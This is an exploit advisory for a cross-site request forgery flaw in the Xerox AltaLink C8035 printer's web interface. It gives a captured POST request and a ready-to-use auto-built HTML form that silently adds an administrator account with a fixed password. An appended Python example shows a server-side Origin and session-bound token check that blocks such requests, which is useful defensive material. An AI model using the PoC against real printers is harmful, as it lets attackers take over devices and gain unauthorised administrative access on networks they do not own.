# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-17
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series
# Software : Xerox Printer
# Product Version: AltaLink C8035
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A
# Description :
# A CSRF vulnerability was discovered in the AltaLink C8035 model of Xerox printer hardware.
# Xerox AltaLink C8035 printers allow CSRF: a request to add users is made from the
# Device User Database form to the xerox.set URI. The request is captured with a proxy,
# and a CSRF PoC HTML file is prepared from it.
# (The frmUserName value must have a unique name.)

# HTTP POST Request :

POST /dummypost/xerox.set HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 707
Origin: https://XXX.XXX.XXX.XXX
Connection: close
Referer: https://XXX.XXX.XXX.XXX/properties/authentication/UserEdit.php?nav_point_key=10
Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp
Upgrade-Insecure-Requests: 1

NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a&currentPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10

# CSRF PoC HTML :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('','','/')</script>
    <form action="https://XXX.XXX.XXX.XXX/dummypost/xerox.set" method="POST">
      <input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?"/>
      <input type="hidden" name="isRoles" value="True"/>
      <input type="hidden" name="isPassword" value="True"/>
      <input type="hidden" name="isCreate" value="True"/>
      <input type="hidden" name="rolesStr" value="6,1,2"/>
      <input type="hidden" name="limited" value="0"/>
      <input type="hidden" name="oid" value="0"/>
      <input type="hidden" name="minLength" value="1"/>
      <input type="hidden" name="maxLength" value="63"/>
      <input type="hidden" name="isFriendlyNameDisallowed" value="TRUE"/>
      <input type="hidden" name="isUserNameDisallowed" value="TRUE"/>
      <input type="hidden" name="isNumberRequired" value=""/>
      <input type="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a"/>
      <input type="hidden" name="currentPage" value="/properties/authentication/UserEdit.php?nav_point_key=10"/>
      <input type="hidden" name="_fun_function" value="HTTP_Set_User_Edit_fn"/>
      <input type="hidden" name="frmFriendlyName" value="Ismail Tasdelen"/>
      <input type="hidden" name="frmUserName" value="ismailtasdelen"/>
      <input type="hidden" name="frmNewPassword" value="Test1234!"/>
      <input type="hidden" name="frmRetypePassword" value="Test1234!"/>
      <input type="hidden" name="frmOldPassword" value="undefined"/>
      <input type="hidden" name="SaveURL" value="/properties/authentication/UserEdit.php?nav_point_key=10"/>
      <input type="submit" value="Submit request"/>
    </form>
  </body>
</html>
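
# Server-side check (added example, not part of the original advisory and not Xerox firmware code):
# a guard for the xerox.set POST shown above that rejects a cross-origin form submission and a
# CSRFToken that is not bound to the caller's PHPSESSID. Assumptions: the token scheme
# (HMAC-SHA256 of the session id), the secret, the host name and all helper names are hypothetical.

```python
import hashlib
import hmac
from urllib.parse import parse_qs, urlsplit

# Constructed demo secret; a real device would generate and protect its own.
SERVER_SECRET = b"constructed-demo-secret"
GUARDED_PATHS = {"/dummypost/xerox.set"}  # URI named in the advisory


def issue_token(session_id: str) -> str:
    """Token bound to one session (assumed scheme: HMAC-SHA256 of the session id)."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def check_request(method, path, headers, cookies, body):
    """Return (allowed, reason) for one already-parsed HTTP request."""
    if method != "POST" or path not in GUARDED_PATHS:
        return True, "not a guarded request"
    host = headers.get("Host", "")
    # Prefer Origin, fall back to Referer; a missing or "null" source is rejected.
    source = headers.get("Origin") or headers.get("Referer")
    if not host or not source or urlsplit(source).netloc != host:
        return False, "cross-origin or missing Origin/Referer"
    session_id = cookies.get("PHPSESSID")
    if not session_id:
        return False, "no session"
    sent = parse_qs(body, keep_blank_values=True).get("CSRFToken", [""])[0]
    expected = issue_token(session_id)
    # Constant-time comparison against the token expected for THIS session only.
    if not hmac.compare_digest(sent.encode(), expected.encode()):
        return False, "CSRFToken missing or not bound to session"
    return True, "ok"


if __name__ == "__main__":
    sid = "constructed-session-1"  # constructed sample session id
    body = "frmUserName=newuser&CSRFToken=" + issue_token(sid)
    same = {"Host": "printer.example", "Origin": "https://printer.example"}
    cross = {"Host": "printer.example", "Origin": "https://other-site.example"}
    for label, hdrs in (("same-origin form", same), ("cross-site form", cross)):
        print(label, check_request("POST", "/dummypost/xerox.set", hdrs,
                                   {"PHPSESSID": sid}, body))
```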